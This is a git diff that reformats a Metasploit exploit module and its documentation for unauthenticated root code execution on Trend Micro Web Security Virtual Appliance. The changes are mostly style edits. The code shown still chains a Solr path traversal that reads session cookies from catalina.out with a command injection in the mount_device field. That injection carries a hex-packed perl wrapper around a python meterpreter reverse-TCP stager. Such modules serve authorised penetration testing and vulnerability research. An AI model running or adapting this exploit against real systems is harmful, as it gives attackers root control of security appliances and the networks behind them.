diff --git a/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md b/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md index fa23cc93ec..f277aed746 100644 --- a/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md +++ b/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md @@ -7,22 +7,22 @@ The specific flaw exists within the `LogSettingHandler` class of administrator i parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. But authentication is required to exploit this vulnerability. -Another specific flaw exists within the proxy service, which listens on port 8080 by default. Unauthenticated users can exploit this +Another specific flaw exists within the proxy service, which listens on port `8080` by default. Unauthenticated users can exploit this vulnerability to communicate with internal services in the product. -Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the file +Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the `file` parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this -vulnerability to disclose information in the context of IWSS user. +vulnerability to disclose information in the context of the `IWSS` user. -Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user. +Due to a combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the `root` user. -Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected. +Versions prior to 6.5 SP2 Patch 4 (Build 1901) are affected. -**Vulnerable Application Installation Steps** +### Vulnerable Application Installation Steps Trend Micro Web Security is distrubed as an ISO image by Trend Micro. -Following steps are valid on the CentOS 6 x64 bit operating system. +The following steps are valid on the CentOS 6 x64 bit operating system. 1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/) 2. Find "InterScan Web Security Virtual Appliance" and click. @@ -37,7 +37,7 @@ Following steps are valid on the CentOS 6 x64 bit operating system. - 8 GB of memory at least. - 60 GB of disk size at least. -**Why Perl wrapper for python stager?** +### Why perl wrapper for python stager? Within the exploit function, you can see a custom Perl wrapper usage for python stager payload. The parameter that contains our payload is going through escaping (double quotes, backslash, etc) and blacklist checks on the server-side. Most of the cmd payload will not work under @@ -63,13 +63,13 @@ contain any special characters. 5. Run `check` 6. **Verify** that you are seeing `The target is vulnerable.` 7. Run `exploit` -8. **Verify** that you are seeing `Latest session id is successfully extracted : 29A589E94A0BC0954F7F9B1FE7EC8858` in console. +8. You should get a root shell ## Options ## Scenarios -This module has been tested against Trend Micro Web Security 6.5-SP2_Build_Linux_1852. +### Trend Micro Web Security 6.5-SP2_Build_Linux_1852 ``` msf5 > use exploit/linux/http/trendmicro_websecurity_exec diff --git a/modules/exploits/linux/http/trendmicro_websecurity_exec.rb b/modules/exploits/linux/http/trendmicro_websecurity_exec.rb index fb1abd83cf..b4b35e5472 100644 --- a/modules/exploits/linux/http/trendmicro_websecurity_exec.rb +++ b/modules/exploits/linux/http/trendmicro_websecurity_exec.rb @@ -8,12 +8,12 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient - def initialize(info={}) + def initialize(info = {}) super( update_info( info, - 'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution', - 'Description' => %q{ + 'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution', + 'Description' => %q{ This module exploits multiple vulnerabilities together in order to achive a remote code execution. Unauthenticated users can execute a terminal command under the context of the root user. @@ -27,18 +27,18 @@ class MetasploitModule < Msf::Exploit::Remote Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations. - An attacker can leverage this vulnerability to disclose information in the context of IWSS user. + An attacker can leverage this vulnerability to disclose information in the context of the IWSS user. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user. Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'Mehmet Ince ' # discovery & msf module ], - 'References' => + 'References' => [ ['CVE', '2020-8604'], ['CVE', '2020-8605'], @@ -47,25 +47,25 @@ class MetasploitModule < Msf::Exploit::Remote ['ZDI', '20-677'], ['ZDI', '20-678'] ], - 'Privileged' => true, + 'Privileged' => true, 'DefaultOptions' => { 'SSL' => true, 'payload' => 'python/meterpreter/reverse_tcp', - 'WfsDelay' => 30 + 'WfsDelay' => 30 }, - 'Payload' => + 'Payload' => { - 'Compat' => + 'Compat' => { 'ConnectionType' => '-bind' } }, - 'Platform' => ['python'], - 'Arch' => ARCH_PYTHON, - 'Targets' => [ ['Automatic', {}] ], + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [ ['Automatic', {}] ], 'DisclosureDate' => '2020-06-10', - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], @@ -92,19 +92,19 @@ class MetasploitModule < Msf::Exploit::Remote port_restore = datastore['RPORT'] datastore['RPORT'] = datastore['PROXY_PORT'] - @jsessionid = "" + @jsessionid = '' # We are exploiting proxy service vulnerability in order to fetch content of catalina.out file print_status('Trying to extract session ID by exploiting reverse proxy service') res = send_request_cgi({ - 'method' => 'GET', - 'uri' => "http://#{datastore['RHOST']}:8983/solr/collection0/replication", - 'vars_get' => { - 'command' => 'filecontent', - 'wt' => 'filestream', - 'generation' => 1, - 'file' => "../"*7 << "var/iwss/tomcat/logs/catalina.out", + 'method' => 'GET', + 'uri' => "http://#{datastore['RHOST']}:8983/solr/collection0/replication", + 'vars_get' => { + 'command' => 'filecontent', + 'wt' => 'filestream', + 'generation' => 1, + 'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out' } }) @@ -132,20 +132,20 @@ class MetasploitModule < Msf::Exploit::Remote return end - print_good("Extracted number of JSESSIONID : #{cookies.length}") + print_good("Extracted number of JSESSIONID: #{cookies.length}") # We gotta switch back to adminsitrator interface port instead of proxy service. Restore rport and ssl variables. datastore['SSL'] = true if ssl_restore datastore['RPORT'] = port_restore # Latest cookie in the log file is the one most probably active. So that we use reverse on array. - cookies.reverse.each_with_index do |cookie, index| + cookies.reverse.each_with_index do |cookie, index| print_status("Testing JSESSIONID ##{index} : #{cookie}") # This endpoints is basically check session :) res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'), + 'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'), 'cookie' => "JSESSIONID=#{cookie}" }) @@ -156,12 +156,12 @@ class MetasploitModule < Msf::Exploit::Remote # If the cookie is active ! if res.code == 200 && res.body.include?('session_flag') - print_good("Awesome !!! JESSIONID ##{index} is active.") + print_good("Awesome!!! JESSIONID ##{index} is active.") @jsessionid = cookie break end - print_warning("JSESSIONID ##{index} is inactive ! Moving to the next one.") + print_warning("JSESSIONID ##{index} is inactive! Moving to the next one.") end if @jsessionid.empty? @@ -217,20 +217,20 @@ class MetasploitModule < Msf::Exploit::Remote # For that reason, I am planting our payload dropper within the perl command. cmd = "python -c \"#{payload.encoded}\"" - final_payload = cmd.to_s.unpack("H*").first + final_payload = cmd.to_s.unpack1('H*') p = "perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'" vars_post = { - mount_device: "mount $(#{p}) /var/offload", - cmd: 'mount' + mount_device: "mount $(#{p}) /var/offload", + cmd: 'mount' } send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'), + 'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'), 'cookie' => "JSESSIONID=#{@jsessionid}", - 'ctype' => 'application/json', - 'data' => vars_post.to_json + 'ctype' => 'application/json', + 'data' => vars_post.to_json }) end end